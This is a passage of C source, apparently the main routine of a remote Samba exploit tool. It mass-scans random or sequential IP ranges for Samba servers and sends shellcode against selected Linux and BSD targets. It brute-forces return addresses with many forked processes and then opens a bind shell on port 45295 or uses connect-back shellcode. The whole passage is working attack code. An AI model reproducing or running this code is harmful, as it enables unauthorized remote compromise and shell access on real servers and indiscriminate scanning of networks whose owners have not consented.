📄 samd.c
break; case 'C': MAX_CHILDS = atoi(optarg); if (MAX_CHILDS == 0) { fprintf(stderr, "Invalid number of childs.\n"); return -1; } if (MAX_CHILDS > 99) { fprintf(stderr, "Too many childs, using 99. \n"); MAX_CHILDS = 99; } break; case 'd': BRUTE_DELAY = atoi(optarg); break; case 'f': force = 1; break; case 'p': port = atoi(optarg); if ((port <= 0) || (port > 65535)) { fprintf(stderr, "Invalid port.\n\n"); return -1; } break; case 'r': ret = strtoul(optarg, &optarg, 16); break; case 's': random = 1; scan = 1; break; case 'S': random = 0; scan = 1; sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3); ip3--; break; case 't': type = atoi(optarg); if (type == 0 || type > sizeof(targets) / 16) { for(i = 0; i < sizeof(targets) / 16; i++) fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, targets[i].type, (unsigned int) targets[i].ret); fprintf(stderr, "\n"); return -1; } break; case 'v': verbose = 1; break; default: usage(argv[0] == NULL ? "sambal" : argv[0]); break; } } if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) usage(argv[0] == NULL ? 
"sambal" : argv[0]); if (scan == 1) if (verbose == 1) fprintf(stdout, "+ Verbose mode.\n"); if (scan == 1) { srand(getpid()); while (1) { if (random == 1) { ip1 = rand() % 255; ip2 = rand() % 255; ip3 = rand() % 255; } else { ip3++; if (ip3 > 254) { ip3 = 1; ip2++; } if (ip2 > 254) { ip2 = 1; ip1++; } if (ip1 > 254) exit(0); } for (ip4 = 0; ip4 < 255; ip4++) { i++; snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4); usleep(BRUTE_DELAY); switch (fork()) { case 0: switch(is_samba(scan_ip, 2)) { case 0: fprintf(stdout, "%s\n", scan_ip); break; case 1: break; default: break; } exit(0); break; case -1: fprintf(stderr, "+ fork() error\n"); exit(-1); break; default: if (i > MAX_CHILDS - 2) { wait(&status); i--; } break; } } } return 0; } he = gethostbyname(argv[optind]); if (he == NULL) { fprintf(stderr, "Unable to resolve %s...\n", argv[optind]); return -1; } if (brute == -1) { if (ret == 0) ret = targets[type - 1].ret; shellcode = targets[type - 1].shellcode; if (connectback == 1) { fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n", ip1, ip2, ip3, ip4); switch(targets[type - 1].os_type) { case 0: /* linux */ shellcode = linux_connect_back; break; case 1: /* FreeBSD/NetBSD */ shellcode = bsd_connect_back; break; case 2: /* OpenBSD */ shellcode = bsd_connect_back; break; case 3: /* OpenBSD 3.2 Non-exec stack */ shellcode = bsd_connect_back; break; } } if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { fprintf(stderr, "+ socket() error.\n"); return -1; } if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) { fprintf(stderr, "+ socket() error.\n"); return -1; } memcpy(&addr1.sin_addr, he->h_addr, he->h_length); memcpy(&addr2.sin_addr, he->h_addr, he->h_length); addr1.sin_family = AF_INET; addr1.sin_port = htons(port); addr2.sin_family = AF_INET; addr2.sin_port = htons(45295); if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { fprintf(stderr, "+ connect() error.\n"); return -1; } if (verbose == 1) fprintf(stdout, "+ %s\n", 
targets[type - 1].type); if (force == 0) { if (is_samba(argv[optind], 2) != 0) { fprintf(stderr, "+ Host is not running samba!\n\n"); return -1; } } if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port); if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n"); if (verbose == 1) fprintf(stdout, "+ Session enstablished\n"); sleep(5); if (targets[type - 1].os_type != 2) { if (exploit_normal(sock, ret, shellcode) < 0) { fprintf(stderr, "+ Failed.\n"); close(sock); } } else { if (exploit_openbsd32(sock, ret, shellcode) < 0) { fprintf(stderr, "+ Failed.\n"); close(sock); } } sleep(2); if (connectback == 0) { if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) { fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n"); return -1; } shell(sock2); close(sock); close(sock2); } else { fprintf(stdout, "+ Done...\n"); close(sock2); close(sock); } return 0; } signal(SIGPIPE, SIG_IGN); signal(SIGUSR1, handler); switch(brute) { case 0: if (ret == 0) ret = 0xc0000000; shellcode = linux_bindcode; break; case 1: if (ret == 0) ret = 0xbfc00000; shellcode = bsd_bindcode; break; case 2: if (ret == 0) ret = 0xdfc00000; shellcode = bsd_bindcode; break; case 3: if (ret == 0) ret = 0x00170000; shellcode = bsd_bindcode; fprintf(stdout, "+ Bruteforce mode. 
(OpenBSD 3.2 - non-exec stack)\n"); break; } memcpy(&addr1.sin_addr, he->h_addr, he->h_length); memcpy(&addr2.sin_addr, he->h_addr, he->h_length); addr1.sin_family = AF_INET; addr1.sin_port = htons(port); addr2.sin_family = AF_INET; addr2.sin_port = htons(45295); for (i = 0; i < 100; i++) childs[i] = -1; i = 0; if (force == 0) { if (is_samba(argv[optind], 2) != 0) { return -1; } } while (OWNED == 0) { if (sock > 2) close(sock); if (sock2 > 2) close(sock2); if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { if (verbose == 1) fprintf(stderr, "+ socket() error.\n"); } else { ret -= STEPS; i++; } if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) if (verbose == 1) fprintf(stderr, "+ socket() error.\n"); if ((ret & 0xff) == 0x00 && brute != 3) ret++; if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret); usleep(BRUTE_DELAY); switch (childs[i] = fork()) { case 0: if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) { if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); } if(write_timer(sock, 3) == 1) { if (start_session(sock) < 0) { if (verbose == 1) fprintf(stderr, "+ Session failed.\n"); if (sock > 2)close(sock); if (sock2 > 2) close(sock2); exit(-1); } if (brute == 3) { if (exploit_openbsd32(sock, ret, shellcode) < 0) { if (verbose == 1) fprintf(stderr, "+ Failed.\n"); if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); } } else { if (exploit_normal(sock, ret, shellcode) < 0) { if (verbose == 1) fprintf(stderr, "+ Failed.\n"); if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); } if (sock > 2) close(sock); if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) { if (sock2 > 2) close(sock2); exit(-1); } if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { if (sock2 > 2) close(sock2); kill(getppid(), SIGUSR1); } exit(1); } exit(0); break; case -1: fprintf(stderr, "+ fork() error\n"); exit(-1); break; default: if (i > MAX_CHILDS - 2) { wait(&status); i--; } break; } } } 
return 0;}